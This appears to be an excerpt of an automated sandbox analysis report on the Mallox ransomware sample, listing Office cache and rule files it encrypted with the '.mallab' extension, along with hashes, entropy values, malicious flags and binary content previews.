                    Preview:.aB..R#..c.(...e....c...n~.&..~.....k/.$'.3K...=.g.....v{..t.........S...\...y..&t1....&.(P....O......w <.../s.lAy.?......J.S.......j.w..o. D`.I..0.Y..|0...&,.9..;.7]b.@.I..Y.[.:..w..]8..Z...TZ.I...I.k...=...t..J....G.....i...-.0ZV.....Y.......W.r....Y.?##....]..5.o.v....1..L..3 .4..^9=..P>.z..8._R.P..y.z.3..C.eQZ..x...)......N.o.r}.L...6...[....w...@n..........Xz_k\.S..1.*..q..n..s..U.v.".Gt..~6.......F.:....u*p.}.V....g.....y...2e...y.`.p.9.r...h.X...7J:_..b.8R...."..'.N_v...!...T..u......X.]r...^...,_...W.+....{mW*\.b..k..1_..{...d..G|0.`.q..:.>........_~....W_/..'..1...}.j>....dr.9.....S.5;.. 5_ir..,.......D.R]n..K..&/O.px.j..Z...n<..5.U...y....Ew.n.....1.cf..v'.....14...,2...M3g|..b9!...E...Ql.f}D...:..J.l+..e8.?....:.V..;Q*..C..,q.X.s..O.2..c.+h......3.V_...K...+.JS.K..a.h.. ?~[0.i...e^+.%..|.l..d.!..n_U..j.eH.eMJh...'.."..._.._2....Z..W..buD..l.&.H$.|..sw0c.[9..m.B......f.R..e"T....T..n....9d..6....\..).*....

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\DTS\en-CH{343067CF-C5D4-4B05-92F9-D697BDB4D02D}\{19EE3739-B3CF-4F62-8AF3-D3139DDA7F2E}mt11829122.png.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14231
                    Entropy (8bit):7.987792445715001
                    Encrypted:false
                    SSDEEP:384:FC42/hzmD7+G4dmZFtjh5TMwZGazH6Yf/kAZRH753Hh+:FC4MRm3+lQfjTTcazH6Yf/b3b9h+
                    MD5:15ACFFCCDEC628D23B4A1656C8BDB977
                    SHA1:0F1CE69D088ACA26F5E941310AC8BDF6203FBDE4
                    SHA-256:1E44CD56092B82A77892DD80B3AFBA37DE14E028C16F2403E6AF465ADE02008A
                    SHA-512:06CBE4E3679E0E14BE981D3DB3FE94EE1896B1D6B4A8842859C742C2143443A26F9849A9F175E104513DD56C2E460F7C3D4780FC0189F3918EE7FF0416B6522F
                    Malicious:false
                    Preview:../.....&.=..+3.j.6@.P%.#vF.N....K..}....[.:.........j....-..L.R.((.).........TO[....jac..}Kl.A.}*{.x.*..E.....c.3..].....b..K...j+....".dXQ*...>I.3k.n.}....y.h...eK{Q..8.=.P...].....m...K...r*.f...]"..#..'o.3 ..^5M#.Y-.EfX0..d......p.^.._..x....*.7........~GD-..1.9~...\.@q..T...RDH...r.)./s\x..s....K`9.-?..q.E.szp.=.l....z...~.".sY.U..4.?.O.v.w.].b...d...r.N.B..K..zy.0.....@_.=N..f....5(.kp:.Js\....'gxP.\,...*{fm...C.z.cI.]....T.3`...D.OW.Er.O 'z.Px.NA.r............].....6..>w..j..$)....C 6..,........#m.)uL!>.e]..<m=.I..p..&R.N.Q.S.!.....qJQ.hc$i..a.n...<.[..1..I..Z.d..IY..]..!8.H.vX..*.K..s^..>d.M.>@.D..P..$..Z.c.P..)...K..R9..h.x.tv.z$.n.n..m._.FG......XD^....-....|.>...1G>...Z....?....r....~._...N."....:..d....V....'.nn..".X].....M......N.=.9S.'.NH7........}.;.4Wb8......4m.m....mF.jn.....|5.6...M.N..~.Y.sr.[...l.../24...AIu......_0.'..`.@,a.F..Q.........Kl..' ....."(..vb.y.....H...XV....=..-.:.4.0....2K].8.1...s..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1975C9BF-831E-44E7-8FD4-112275A074AD.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):162317
                    Entropy (8bit):7.998916240359993
                    Encrypted:true
                    SSDEEP:3072:9iFHgMu4MyFEG6CSsByrbFdVysImpjDhT7CxG8Y4O/rR7yDDxs5r4t2FxZ3RPr5w:9MA7hCSsBKdyQZnACR7yDer4UxZtr6
                    MD5:1D1F599D02C66255AABACBF8FC9D471E
                    SHA1:58383841957D9B43F691AFC9CF54D44863004C3B
                    SHA-256:CC1B5CE185D2798B5E6ECD32409E136D25848906CAB269B311294BB064325AA9
                    SHA-512:17D341142C54D633B924D8118CEEF96D0E1CEF795CCB52217DDBE19222F7D41FEB72C394AAB4D72B152AC78FDB2641EA3535E921534D67BC23026F0728B42DA7
                    Malicious:true
                    Preview:.......I. ...9.....!.v*.......6..;..JG.A...8. .........VR..\v..T....>?..........3.{.:..-q5.] 8b.=.. ...S.{a.*..t;..CU2Z..a......s.l.{JS\.g..........|.$.....'w~%...\.....J)f.8vm../i...^...bO...x....4UcO..)7...&....m..=hXgU..[A.h.RB.:..%.i.Mo=....!.\./!.9.....F7..[.#.D.O`.%..A...'.l..>s.{.wi.5.O..~T.!.M.D&.yJ.u..'E.....(w......9:9..d....-.}.g...n....+.4.7jhuN.u9..P.B9.|u.".Q..`2lpwP;P-=/..P.G...<$.,-K..^-I....QX......o.-. TO.......2].+.P..+...o.3GY.-Ss.......f.J1c.....?i...$ms.H.`.kP.W.5w...TS........oH..4..X._V.j!.u..I.&.9.8V.,...w..CU..a.F.....<@.("m.@.k.qen...{5.1s.zH..UI,.`.!.......'...@J+..g$...h...X..+....p..D.._....._....^...9#y.8....k.P..x.4.....C.j...q:..>7.Wh IY}.t.^...Rw...m.....5..m.g.*q._...r.=......f.{p.....X.Y.S.@..);x.*G..~....EQ.q..*./#..$.3.....Y.z..Tw..wj....{...=...P .V.....ic..........eW.......Y.....-.Y..H.....i..5.H..c.nZ9@.`Ffi..T0..oO.Yy..6X...'..=O.FpX..^j..w.\.,...I?...q..q..l{.....h.b.....d..p6.v. ..3.O.]p9V.`..{

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7FDF1322-9EAD-442A-85C2-C39D5CC6893F.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):162317
                    Entropy (8bit):7.9988577875993645
                    Encrypted:true
                    SSDEEP:3072:wcxj2V8yw+xHVnrFtaUi/Pu/CXUMuxBuEqJeBvKOJkv8n:vUZxXty/P6LMQBuErvLo8n
                    MD5:18AF0DE4711AE06F06F21C94C4998341
                    SHA1:BB3BE56B53CB3BF381CDADE3F1F865038C2B73FF
                    SHA-256:CA48C0D0D3CF2EE657FF0C4B6388693C8ED38DE4918A264366252392F13F65D0
                    SHA-512:AB0850268C195725A0EC7F05084E7238D7A15DE33620FDD9D778E5857EFD731A7A03B8DDA939B6465B07738201CA50F12EAD0ADC7E5E4F2A036665A0A197E58F
                    Malicious:true
                    Preview:...,.pyY..l.9|X...I..=.+......E..2....a%,^....c.#..M.|.V.."(!.. ...n/*....p.<...P.`.......'~.....O...v.%..wR{I..b..A`x.mU?..........K..;....EW..l..u...L.k.Q...W..j....N3H.u....$.S.C......rIS&.q..RK,..T.w.M..yO...3.#.........$j5E<j4.\..^.d.WbHy..g./.c.aM...Q..Iz.....j.*..*.ID..=....d4.O.......#..L...3+..A.%e..........=.....u!.......Yvr..b....7Z...*..4.......d....L......Q.#.;.N..................[..&.A4.X..forB...u*.w.......2).d.....F..<*W..Y+T:...S.NI.H.En.t...N......J...p6jh...+|.....]......8.....7..>..<.[../.ka.;. >'Td_:.kA.i..d..g.'...AW.*E...QD.[S.R...r.Q...-?..........O.7.c...!...#......./Z.H...Fs#[...".V......+....*......S......8..M.G.UI..[...h.(M7+....D...........n...Tx...m8...\.....n..f.pk......Y..Z`w.I....F<6f.H..i...I.Y=S..4Z..Y:...j...t.@.4.C-l.0.X.Ru7I...uf.h......Z].l.s.....?.6......yt...!.\0ru...:...I..^..p.(..(W.I'`J..Y..e-..-XeU..d.....k.xT....2..@..<M..#6....._.j..O... .?V.rr.......k.Q.f....f..e.".....C.?..z.v.C.`.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\excel.exe_Rules.xml.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1062665
                    Entropy (8bit):7.999812973476683
                    Encrypted:true
                    SSDEEP:24576:g/YuIXTLRbqWzq6IAgyZAThBqRu8mmg517wkalLpqNjE:g/KRWWzqmZ8SIzLDUkalgjE
                    MD5:82E8FF5773BB89E5F31463EFB22DC367
                    SHA1:971A62219E029902621092EC81DDEB6B5E9D3EA9
                    SHA-256:39C14AD5AA7B18CFE1772B8F619F59DEBAD3F15EDF9A7384F038BFB4EDC7617E
                    SHA-512:6F4CEAACB0D68D9195C257915743D645B4E87CA81C3076B9B550FDC77AE4B6D809DF7303EE0A1669E96861809FC9B0763957CECB452E951A49198AE92FF5887B
                    Malicious:true
                    Preview:.#.o.V.l.....E.|.,V..%.>N...V]L....,.[&....;..M.'0...\R.yO>.....>gU..S.'KC...mD.F?.....O..+....a....]...?.wR...yg.g..t..d...y.....6...#..Pp..[o.....+u..E..fq..RB.5..*..I`..P.{(..a.K..|...g"^ct.D....Bl..0...9A..JPu.N.y.....X...r....>[f....vx.iyY....p....v.d..PE0.!bwbx....}.s.x.=....4..g`....r....... ........R.fn:E....@.5J...c.I...o7fF........03..L../.v=.C<.........^...Jmf6I5R..S?.JE..:.,.K...@.(.~.........m.....X.7.Y.....1.\........c=./.^....".t.xv2...T.......].....K.V.Vr...H.c..N;.....?...-.c.R......`...&|N.m..`.oK.A.|.....(`xCD...7.....r.`.#...j.5 a...;[[..-... ......b..B..M.m.;+..{+...!!.....G.e".Z.26/...-.....T1.K....>..09.......GG..O...w6u\../|...-.UO..7.h..^-..@&..8,_....Kv...Cg...$....... P........x.Ru.6w.N.pOS......%../...f"y.s>...(.<..Kg.p.......C...75....1.?.......h38>.>.vd..Y..SX.lF...y.?XZ._u.i..N..J.]V..R.ns6......GE.cyv.g........_.:...Pd.R.!..d.g.)..1....r..=l....)l.e......|4.zA.~{I....1..vW....C.W@...?m.aK..B...<Q.cg*..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\excel.exe_Rules\rule11446v1.xml.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):10837
                    Entropy (8bit):7.981645988466751
                    Encrypted:false
                    SSDEEP:192:7iNwaxw48K/SQm9yMyLElxGyGa7OyqLMVLr+Yff+QrktQL/2LGh8a/Z6DeNS1vG:7kwavFWYyP7sM5+of+sk6/2yhz/wRRG
                    MD5:BF5445A840EBA94726C76E5D5181D7E7
                    SHA1:FCDA6C1F66DA692D5B1F5A63CCC98559BBBB1C25
                    SHA-256:B2E94C328926C2C38DE37750D66C2EF6BFD5079C452BDCF9B044E0B7443FFDC5
                    SHA-512:FC421B7BD9CB737E25FDB60F7BB832FF469239A7F705E2781D193BCE4D8FDA444FD009B8095E3771E67BC0B9DE143CB47B7F0F30EA7ED5FF24E1AA27117A5DBE
                    Malicious:false
                    Preview:../.. ..Yr.z....=fh'.......Q.J.r....d.\T...F.o..w.cF%...a...@at.ws'.&..4.8X#v..]V.0......Ev......d>^.~...p...7&Czv/i...)._l..*..R>\..aFZ.....m..8.:...z.b.&..C)P......d...........R.A.h.D}.K...c....r..u..\e\.BM..$....wb.\..O.v...g....G......+..N.........t8...H..&;..Y..rnt..{qOD-.H..&.G..\...bW..V...s..8o1.....25.Y..p...i...K.xbgG.p..c..{8.]..O.........:..q...:2.w{.b...X.Ta....&..G.2..!..[...f...P.....t.r.....e...{y.........#..d.q.....f....23....L.......'M<.@.U.-7..L..........2.x...PT.1<.....A.....b..d%^l...n....P.2.x.c.............\o1O\........+P[B...y...K.w..02..u....$9P..KK.<%h.}............|...T...!....?..~T.TH....C..q>.GR..x.:.5L.i|[G.ay.xy..}n.[..B.........qz.3>.t'Yq_..V..........z0.......[$s.*xD.x..Fp.o.{t..jf......#...X}.oT..0.,.....g.T.....PlOA!;.bf...!B.i8.;w......yN....{m.{P<.".A......m...2..$.KPF.*...w......|I.a.....D.<n&.ym,<<>.X.24..8=p.*e .j.....".d.2..&....P...6.,.]..^.=\4.......6/...g.G..#...J.A.H..-e..W..C.m...\...(O...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):44266
                    Entropy (8bit):7.996461239470519
                    Encrypted:true
                    SSDEEP:768:SDq2gSeQag3oxpofbgXMa/oVr2SM5yP+CfewOpreLS4s6tsm+/0iHwYUdQaNE6hR:S2rgqK8Z/n5ymCWwOpiOOtsm+GDuGhUu
                    MD5:EA55BA878C9868F0E1C80B51766CD493
                    SHA1:C36535A7F462F47EF4EFF8B06BD3BC36212B06BE
                    SHA-256:3C8F1522D034EBF1A900E688162750A08823AB6ACEFC131501BDF549497D1D14
                    SHA-512:4228A53C8FB2F28D163F9DDD16F12E700CADC8E6CEC7220CDB807F8FE35FD11F92F30946E42F52EA9C3A617915022F1BDF8DBD00E1C77B8BB8970D1E62AFA902
                    Malicious:true
                    Preview:$p..K6z=.....O.M..1.../`...C..C@-..v.\.-RZ&.IgYk..%.R.9].....j...K.A.U......l........]..L...H./F."y.B.4.o.<....0.>n:wb..l.mq6......k....5(..Rpc}..\.s.WZ.hC..2..>#....({....SUZkO/.r."..4~.Kj..=.*Ms..A/...6v(<.......a>..D$.....\....o..#6-....8X..e.....ES.3.w....<..4...@J76.W;.......*....[.:.z....t*....,lg..,..=u....\.V.m.n.w.!.....LHt=b@..........SZ]....a.....-........F..,..V(.y%.0.!...26...@.....&|wWp.,{.. i..Q..x/L&.:k..(.H_.j%...Zm"..../c...@*x....4'.w).2.D.ktE:.w\.X./W..n.].[i.=....%.A.<q.5D.kn......^.........E#...c..`.....v.G..?5...Gby...[.1,."N.f..=.....%.+.9z....E".........9.K.....<.....&.1).8#../...,..`..]....b..?...b.....@|.F..h."..I.1.ch...v....b.6..3u<.9.%..u.H..G...L....J.]..c.Pb.......f..mT".).."E..._......?.\.k0g..~7.n,..{.9.J. .......I....a..M.....*%..u....M(_.@.....HAKV..N84"s....]M... .......g....{..4.....:F....ma..7DH..Z.0.5.K..~W......lpR%...Q8...nA.N.yl1.p.`g.F<n..,..t5m.......D./u...}].............t.d\.N......7...A..f.X.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):40982
                    Entropy (8bit):7.995741788416654
                    Encrypted:true
                    SSDEEP:768:3Pb+AYj3J2cabIy9meE8ThQ99a6D1UbPVLXwb2SSoSyBl3JdMCa2QxioiLxF9K:3DrYjkbIy9vU9ZCXwSIS6JqF2qrixTK
                    MD5:16001E43A9DB7F969D872B348EFC1AB2
                    SHA1:9DE108EEFBD22F9D88B0B960BC7EA7702ED05DF4
                    SHA-256:8DB815D8BDCA1F84DA46869E93990982AB5A7F93B93CEA456C6FC01EAEE8FF2C
                    SHA-512:6F0C368CA5B3B16EFA5B7ED324658EBA0B68FF7A308115D9EE6A35F417DCEC18340590E8249899689CAF7AB59E5D48AAAC3FCE6F87DEA68C91E242ABC0A7AA93
                    Malicious:true
                    Preview:V A.^.uN".....r$x..G]."b...dWDF....=..].>..>Z.$...KU. .\......?.....r...em.f.\H3..`..fe_.....j.K.V. o.b....z_...@\~d.E..D.....n.rP9.>.g..W....!'.m....X..4."a..[8..'.x.A.H..x..B..F.....Y..W~.>..5...xD.$7.(.<{.B.$......H...X....v..%..D..N{=yE.P.R...].7F|,...-..3Rn...B)0.m....8...=.^)..8^X|...E...M\..Dr.*-.i..s*V.........X..X..........>U...?.......6...9...A.AK..].)./.....{e...!V.#..d-"_..Ssv.!..y..}...x0.hCQ.........P..ljA.)........dI......l..R..7.=v..i|..q.B+i'..'.......X.(6-..L.w.d.3.....).C...o.:v.S.h9w.".Iu...(B....`..o...>..O\(.p.ZL...j.^..JtB.3.....W..(+...<...d.4...1.e'tHs..&..N...1..E~#7{.60a..0.....)1..EP..+..{.Xd.k.x&ml....".@.E.......S...ip....0.z.(,......q...:.z...m4..(....O......6wXo.>.A.i.RJ1....vhm.F1_$.w.|6.f...1.e-...........J..TY..[.G0...1....._..'A......?/ ..Wz.]...S..(.0#z>y;.3.....crwA.Ye..1C..... .....lM.?....V.T.s.)./K..S...a.U..N[..7.\V.t..=h%.B\S.....4Y.'...^s.......q.#...>7.,.b........]?..4.[UY.j7..@....=.<..l..3..Yn.>....

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):360825
                    Entropy (8bit):7.999602196635424
                    Encrypted:true
                    SSDEEP:6144:B8fCEXyouYZSPjSyPHxm2q8zcd0rqWYgxM6Q33znQriWMWEw2PJEeEcE1YsGzhZ:JECRYZSPjdBq8IdIi6MRHzQrrEDmxcSE
                    MD5:535217D1C180D8A7FB24BC3D66BB8CBA
                    SHA1:2873311F73F22EEA58CADAE70AB62AD552CAE59B
                    SHA-256:FB9AAAFB5B9C0862D0F82449C81EB70CB32F11DC3F83D804AF7199B2D641F4A8
                    SHA-512:597AD460C2067561503867E377C418DAF3F290F92429EA569C3829C535B4E937B035C23CD1873F711CED06ED66C58A93098FCBE236D89A88E163C808D8A957F2
                    Malicious:true
                    Preview:.V.R.3lvNo...I...Y.8=...L...d!0X.3.'...N#%..A..,.q......~..`../g..9.kf8.5l.=<S....u.C6..,..Y...D..T*.7b.?.{.erb.M.Ho....3T."..j...r8..s.%(... .. .b{.......U..J..{0.f!"c"n...F22.oL....4.D.L... 7..W.......I....@G...U.q.IG......+...T....br..q...M~.... ..+.r.1PWO..d.[.F^._d..E=.r...6...T4>....O.;.W.~..*.u\y.]b-.O...Qn...a.p3...^sZN.e....2~i].3.&.D.bt.Lm.g....G.C..Y...Kw.$5..u.8t.y...V7=..5z@<d9......T.c...a..7...<)-v=B[v.3S..7..........*.....".&..,.O....\..<>.<=.b.)....B....J.....+@..x..F......q.[.$....."g.........n......h..n...?3....+..$...-.h..`...Bv0.kM..z..:!.j......-...fYE.H..Q#.m.`.R...........?.........;..:..`..n.@..xG....1M.$[F...#....c=p.0....A.J*Z..^.....2.....5..U..?..S..C......_8.q.|.49..7h..1e.l.ko...R.[......j\...E.5t.S..Ho...@4dk.. ..n?..R.].5...~.C.(.X.2C.s`.e.'....0(.D.j*...........0,*......p....{...1|..9..p..Zk...J.....Y.rA..GR..ik.....!..x....E..F...}...]B8.f_....P.Gx./[..y...l..>.p....Z.RkT`...<.v...o j..4...R.a...d....+...Z.`.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230170v1.xml.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):23732
                    Entropy (8bit):7.993453697180056
                    Encrypted:true
                    SSDEEP:384:UshG1B6CAe0/U1T5/SjSW3UPR+OIQG9AMMRAg7WTqzQLWbqjNIWnvP1Zf:UsG1B6CAxsTZSjSW3UPQPLPMugC1ibMN
                    MD5:1EC9484561606FB86B4A53689EC221DD
                    SHA1:55E24F8ACDCC45870037E0DE88DD57D49144726C
                    SHA-256:7F4097E19AD46E8AE16E8D9F8C6BF4935F054B19BAFEE74B4E336CDC9233394F
                    SHA-512:1F0C9DCD5A98598852B9BC900859FCC1F359C889F88D63D7ED856DE44E1C67A03CE078441D0C90B1A41213BEA97BA9721511B4CDBCF4E01238DE1EA663CF3E48
                    Malicious:true
                    Preview:...j.f.<.,......I5C..$).{........$P.(.]......}.z.w.....#:...]...M.W.EIs.".....p',...4.;...$.E.<A-...~.s...=.............f...!.$..0.K...V"..n9.....}...J.,?........j.`/..g.9.S.....30.F..p.>.......3.P%..3...6N:.I.",I...DU....G...?...sD..........\......w..c..W.......pF..,J.?w.f'.u...w.qw.....k.6G.h.3.p.l..!.../..R...d...e..P..a.:8.a..p...d9Yl..Bh.Lrf..Y.y.MnIe.By.>a.s...(.^X."..8R....#w..'..~.Nk.i.?.....@X...'.p&l.*.Y..T*!..h.)A....5.k.>...a%.i`...Z..rX.%...Z...A.N.".y.EX...O......o......Q....v.N....-0.U...+....,XF...;1K...y....G..0n~#beU...`.P...'..Z.]<.....fC.)Xp.O.W;U.y.k(.+o..G..oM.w..n6..W.'.A.?....^....4.D.uaO...G...=@...&eZ.....f.hK..|>R.(..k..n:]..2s.B.YJ.O@M..>W.l....^..R9.....w.%.m....'p...s..dl....x..mq..{..}.;a...+..>..Wl.{.K..ZP.Q.,B..yn.v..e........D..z+.Y.7.l..S^r. .A.y.v...&.1#..f..c\.p.QY.9...Cn..{zj1;6...q.j....O..~G..u5.O......DR..B.hqbj....(.z.....7.voV>/..D..!.N0G.+.^.6&.z.a~i.8..'.;*)..2.q.#....W..o....z..}o.)k...P...C.L

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230172v1.xml.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):31518
                    Entropy (8bit):7.994721623361359
                    Encrypted:true
                    SSDEEP:768:h6HMsCTBjPqNwYdub0q78q46ydIoya7dcrz:KMsCdjPqNwYdAthydI+7dcrz
                    MD5:D5F0E46BD096A6B4C8C51D2E1D29E764
                    SHA1:24A0D4D9B5826E79BAF66EDAA244F711B024617A
                    SHA-256:BE3ADA42FB302CFC1323C5802D4AD442D8B308BA09EB1C2587D0EB91E562871B
                    SHA-512:31C4CE0A1F58447211D193D0C0F33F040C9E347B87BDA079AA0B9A15BDFC710F448E1A39AFD1864F09346D7D90F7CC2636403DCCC0215F5CB3DEC49796DFD543
                    Malicious:true
                    Preview:.J.}..}.E..C.AB.e.f{;...C..D..[.:n..... .1..\W.R.%&...o.6D..~........y...(-q..\..W.....~.h...t...9!.3)..57a..L./tB.T.V^.CF.f..X....bR.... ..]H...E.....{.q.....D...W...f,cptuM..+.]qGT..!a..qK...z ....o.............H...2R....b.{2#.N.!?..|.......)*.K..Um./......g..n...!..`@>....B..:..J..iQQ....=..x.4..(...^.d|._wy...99Gdu.rY...;+Mr..o....0..0.`|..#..`3...T}.u..]....+.9(X..p...!ZT.x..EMD..z.E,..JZ.....p...+...1im.F.......T..Tq...P.p.I7R.T..A$..aGj..T?...2...+[g. .._..t/t..Wv..U6m..~.'(.....$Sq..L.\.1=*..(.b...?...h.....f..h.|..k....[..E.K.O...{.O^..3.X.f..S..0"..,J.......6.....6K-........_o!&._.8J..X,...'q...].1.f.D..`...m..%..#z...q..U.}..|.WLw.+G....&Kn..UM...+..&.............3.......`.u.=...$.....l.%..K7,.q..y......3[.].$.)G.].........&JR&..q2....K.0c&."Y...[.vBd..XD......ni....'~OD..W.&g~+b....E.....I..z.>."......i/....:.....*@3T....m?. ...Q~k!Z.EU.V..0....5..T5.%q..?..Q..T......X.S.8...l.:....2....N(.h:..O3:/.nI.+.....).?....

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):360825
                    Entropy (8bit):7.99947755837842
                    Encrypted:true
                    SSDEEP:6144:Ht/VP9gGyagCybcCPWr1S08p9AvWvrnDkGtAKj6Pov/vmMtuPDk:HtZ9gWgCycCer14A+HkGF6cnmM2Q
                    MD5:339EBD6B2350C59A7DE5945B0C2FA5DD
                    SHA1:CC44087DD59005C3A2E11AE73AE54BDEE7552F31
                    SHA-256:5448EF8A3DB7398AF52FD445B01A7993B6D5CBAFD7BDF2580DA014824853515F
                    SHA-512:6CE15D9FDFB1AC2463C252289EDC9C1D7D898F58E2C836D7C9C235D98E207E6E4A09B219E15DAAA522CEB8BFE2A187D5D25334CD229AAD06546D4DCC55EC4BD1
                    Malicious:true
                    Preview:.1D...k..J.a..L./..-(....3...c..A!.=W..tp..J.._..i..7...i...T.1...[MG .d|.41IQ....?.t.-.....o....rp..J.Wc$%..P,?.Il....c.,G.c.&r..i.y..zP..G&...V3....r..q[.....-*i:v.y.Q0.TX.q..e.(e$d.J........G..R....s,\.4.....%`....8....|......T.2c.."..JV.jNa..S.....2.r4.....h....;..`.}.d.............F...._.._.V......K8XU..4.....l>.e`c.b.o.&6...!p.].d\.......Ge5g.3....M..]|....#.>....|..r..:.+Ue.......r..Z...D..C.)...L.Ylo...............p..T...T.Z..O..N...b/.....S.u.>...9g.cnx*...........w:.[.......M....j.F...\E....^.'w.....,4..U.4.G.Y..$8..Y.......T[Z..h3.E...w.w$^.....`gQAR..%.Y.:.,h......a..Q...i..!....nx9....O...[.f..h.L.n..qq8.f.T.U.mB.<n......>.....!.G3.....<....^...}^@6.d..8...4.6S.>4R.I.?5L..M.m.N.......C..m......,q....7$P.v".BJ{.m}....gc.K....7...M3WB._.......%.m.f/k.~3......G(=......a........,... ...jK..f...v..A....eA.x=.f...<#T..Sd48oo...G.E...V..-..N.4...j,7..#..OP.i]..-.]...&....n.).{h.HS.ZkC.a.#.w^.+;.@w;......H.3a.@....p&..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11446v1.xml.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):10837
                    Entropy (8bit):7.985262494038423
                    Encrypted:false
                    SSDEEP:192:5achtjYqYzCejfhvI83CXmkO8ZDUWh2KMNUhR/TVVWAPQVzRnbebg:nSqY+ejV7KZZDz5RNTV9oibg
                    MD5:6758F4129052BFF6311A4A04939FAF58
                    SHA1:AA90B688DAC737B4592F4DDC5CB1ACF5DB31454B
                    SHA-256:92FFCEBA9246B5BEDE8AD6C603B351B3509CAB071721FB3BF29F338918319D85
                    SHA-512:F23FBB83535EDE3B36C9F6641CD9AB6712B92EEEE16E8E31DD016B5E9131758B6BA034BDCAC9858783BAC948CA1E75BE24981603AF452277560C1B5CE9B28537
                    Malicious:false
                    Preview:...w.Q.:..Nk`..m.S..O....k....7..V....zT.g..S.Ig..C.D.....I{(O.$j.."1\.e.\..c..fQ........Z...V'.;.!F9.T.2....fY.*.Q..[..'..7........).d.SF.%=."....\>AN..sa..T.VX.X.a.t..X..........F.Jo...T.7...F?.&J....+..P.8...IA..l..&b.g..3....\.......#,....in.....r.BV.;.)..!d'..m.. H.2..o.s...=PcPY.G5..GjM....A.0!..k...:v..ty....Q..k.1{..F...|...{......4..a%.E....]..B;).p.~......g.....#.n..ll.=..K'...?fEH.F+ {.....]W.f..F.1.6.>.[1.10P.W..@..b.}....Hv:....>...t.}..^$.X....}.Z.jJ.Q.O....Fc.. ....U..35..q..o7$.,...F.V.E..........'.{..+..>.....t.5.58..cpX9..j....uHM1.o..-....Q.F..2z..0.VaK.....7..i`qJK.}.v.(...Gzy......9.c..b..N....J$...7.R\.'=J..!..%.....}.;.b..'"NS%.|c~..n...m.....Am..-.....dU...........]wC.b..n..pw.A.&0;...:...^..n...'<..u..b.pt.u..2k......M..A(...f5U.X*..l.....G.....4....0..I....1m[...ZZ..[..>.........../.%.....{..F...C .."k.:..;p:TBc..3b.....*..?....!.......t.c...%...H.G]....0..K..T.v ..r@....d.b..j.l.P.....................9..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230170v1.xml.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):23733
                    Entropy (8bit):7.992125838964302
                    Encrypted:true
                    SSDEEP:384:l9TwsMP65BKhHJNV61eFatZGG2n/LDqTOG3V53BvXXUP3JTkSdmccJAw0v12ldH8:Dwl65BKDhFa/GTn/vu5xWJTkSQDWxQkD
                    MD5:FFD8DEC107E5CC32C92B92F2E04B8F37
                    SHA1:AB3A023EF69D6DE4C93AA94B1AD0CF8BA73CE213
                    SHA-256:FB9C2147463CD7EB591F19C6C738B7761926013661048687D29B92102F38DC0F
                    SHA-512:7A2E59D22348BEFCAEC76F2E4A55E8D5FD1D5B7AAEECEE9E0D3938E0D0FECC6029FDC0ED1947BC4C9F5191A2E03DFDA74BA20BADCF8A4D9F4E072C45AA57972F
                    Malicious:true
